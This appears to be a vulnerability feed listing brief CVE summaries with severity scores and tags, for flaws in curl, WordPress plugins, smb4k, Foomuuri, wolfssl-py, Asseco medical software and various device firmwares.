CVE-2025-15079
MEDIUM
CVSS 5.3
When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts *not present* in the specified file if they were added as recognized in the libssh *global* known_hosts file. [CVSS 5.3 MEDIUM]
Ssh
Information Disclosure
Curl
Suse
-
CVE-2025-14984
MEDIUM
CVSS 6.4
The Gutenverse Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file upload in all versions up to, and including, 2.3.2. [CVSS 6.4 MEDIUM]
WordPress
XSS
PHP
-
CVE-2025-14819
MEDIUM
CVSS 5.3
When doing TLS related transfers with reused easy or multi handles and altering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally reuse a CA store cached in memory for which the partial chain option was reversed, contrary to the user's wishes and expectations. [CVSS 5.3 MEDIUM]
Tls
Curl
Suse
-
CVE-2025-14524
MEDIUM
CVSS 5.3
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new target host. [CVSS 5.3 MEDIUM]
Ldap
Curl
Suse
-
CVE-2025-14505
MEDIUM
CVSS 5.6
The ECDSA implementation of the Elliptic package generates incorrect signatures if an interim value of 'k' (as computed based on step 3.2 of RFC 6979, https://datatracker.ietf.org/doc/html/rfc6979) has leading zeros, and is susceptible to cryptanalysis, which can lead to secret key exposure. [CVSS 5.6 MEDIUM]
Information Disclosure
Redhat
-
CVE-2025-14275
MEDIUM
CVSS 6.4
The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.1 due to insufficient input sanitization in the countdown widget's redirect functionality. [CVSS 6.4 MEDIUM]
WordPress
XSS
PHP
-
CVE-2025-14017
MEDIUM
CVSS 6.3
When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl, changing TLS options in one thread would inadvertently change them globally and therefore possibly also affect other transfers being set up concurrently. [CVSS 6.3 MEDIUM]
Tls
Ldap
Curl
Redhat
Suse
-
CVE-2025-13679
MEDIUM
CVSS 6.5
The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_order_by_id() function in all versions up to, and including, 3.9.3. [CVSS 6.5 MEDIUM]
WordPress
PHP
-
CVE-2025-13504
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS. This issue affects Real Estate Pro: from n/a through <= 2.1.4. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-13034
MEDIUM
CVSS 5.9
When using the `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey` with the curl tool, curl should check the public key of the server certificate to verify the peer. [CVSS 5.9 MEDIUM]
Authentication Bypass
Curl
Suse
-
CVE-2025-12640
MEDIUM
CVSS 4.3
The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. [CVSS 4.3 MEDIUM]
WordPress
PHP
-
CVE-2025-12551
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS. This issue affects ListingHub: from n/a through 1.2.6. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2019-25295
MEDIUM
CVSS 6.5
The WP Cost Estimation plugin for WordPress is vulnerable to Upload Directory Traversal in versions before 9.660 via the uploadFormFiles function. This allows attackers to overwrite any file with a whitelisted type on an affected site. [CVSS 6.5 MEDIUM]
WordPress
Path Traversal
-
CVE-2019-25290
MEDIUM
CVSS 5.3
Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. [CVSS 5.3 MEDIUM]
SSRF
-
CVE-2019-25284
MEDIUM
CVSS 6.1
V-SOL GPON/EPON OLT Platform v2.03 contains multiple reflected cross-site scripting vulnerabilities due to improper input sanitization in various script parameters. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2019-25280
MEDIUM
CVSS 6.1
Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions. [CVSS 6.1 MEDIUM]
PHP
XSS
-
CVE-2019-25278
MEDIUM
CVSS 5.9
Facesentry Access Control System Firmware versions up to 5.7.0 are affected by cleartext transmission of sensitive information (CVSS 5.9).
Authentication Bypass
Information Disclosure
Facesentry Access Control System Firmware
-
CVE-2019-25277
MEDIUM
CVSS 6.1
Facesentry Access Control System Firmware versions up to 5.7.0 are affected by cross-site scripting (XSS) (CVSS 6.1).
PHP
XSS
Facesentry Access Control System Firmware
-
CVE-2019-25270
MEDIUM
CVSS 6.1
SOCA Access Control System 180612 contains a cross-site scripting vulnerability in the 'senddata' POST parameter of logged_page.php that allows attackers to inject malicious scripts. [CVSS 6.1 MEDIUM]
PHP
XSS
-
CVE-2019-25259
MEDIUM
CVSS 5.3
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. [CVSS 5.3 MEDIUM]
CSRF
-
CVE-2017-20212
MEDIUM
CVSS 6.2
FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains an information disclosure vulnerability that allows unauthenticated attackers to read arbitrary files through unverified input parameters. [CVSS 6.2 MEDIUM]
PHP
Information Disclosure
-
CVE-2026-0747
LOW
CVSS 3.3
Exposure of sensitive information in the TeamViewer entry dashboard component in Devolutions Remote Desktop Manager 2025.3.24.0 through 2025.3.28.0 on Windows allows an external observer to view a password on screen via a defective masking feature, for example during physical observation or screen sharing. [CVSS 3.3 LOW]
Windows
-
CVE-2026-0730
LOW
CVSS 2.4
Staff Leave Management System versions up to 1.0 are affected by cross-site scripting (XSS) (CVSS 2.4).
XSS
-
CVE-2025-67858
None
An Improper Neutralization of Argument Delimiters vulnerability in Foomuuri can lead to integrity loss of the firewall configuration or further unspecified impact by manipulating the JSON configuration passed to `nft`. This issue affects Foomuuri: from ? before 0.31.
Information Disclosure
-
CVE-2025-67603
None
An Improper Authorization vulnerability in Foomuuri allows arbitrary users to influence the firewall configuration. This issue affects Foomuuri: from ? before 0.31.
Authentication Bypass
-
CVE-2025-66003
None
An External Control of File Name or Path vulnerability in smb4k allows local users to perform a local root exploit via the smb4k mount helper if they can access and control the contents of a Samba share. This issue affects smb4k: from ? before 4.0.5.
Information Disclosure
-
CVE-2025-66002
None
An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users to perform arbitrary unmounts via the smb4k mount helper.
Code Injection
-
CVE-2025-15346
None
A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced.
Python
Tls
-
CVE-2025-15224
LOW
CVSS 3.1
When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally running SSH agent. [CVSS 3.1 LOW]
Ssh
-
CVE-2025-8307
None
Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. Passwords of all users are stored in a database in an encoded format.
Information Disclosure
-
CVE-2025-8306
None
Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. A low privileged user is able to obtain encoded passwords of all other accounts (including main administrator) due to lack of granularity in access control.
Authentication Bypass
-
CVE-2025-4596
None
Asseco ADMX system is used for processing medical records. It allows logged in users to access medical files belonging to other users through manipulation of GET arguments containing document IDs.
Authentication Bypass